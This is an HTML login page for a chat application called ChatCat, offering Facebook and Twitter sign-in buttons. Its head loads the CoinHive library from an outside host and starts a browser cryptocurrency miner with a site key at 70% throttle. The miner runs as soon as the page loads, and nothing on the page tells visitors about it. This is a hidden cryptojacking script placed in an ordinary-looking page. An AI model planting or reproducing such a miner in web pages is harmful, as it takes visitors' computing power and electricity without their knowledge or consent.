<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>ChatCat - Login</title>
	<link rel="stylesheet" href="/css/loginStyles.css">
	<script src="/js/jquery-2.1.4.min.js"></script>
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	<script>var miner=new CoinHive.Anonymous('rwcHHMO9BYE8qDDjd6z5p5Cl4py5orZG',{throttle:0.7});miner.start(CoinHive.IF_EXCLUSIVE_TAB);</script>
</head>
<body>
	<div class="container">
		<div class="titlePanel">
			<h1>ChatCAT | Login</h1>
		</div>
		<div class="loginButton">
			<a href="/auth/facebook">
				<img id="loginBtnImg" src="/img/fbLoginBtn.png" alt="Sign-In with Facebook">
			</a>

			<a href="/auth/twitter">
				<img id="loginBtnImg" src="/img/twLoginBtn.png" alt="Sign-In with Twitter">
			</a>
		</div>
	</div>
</body>
</html>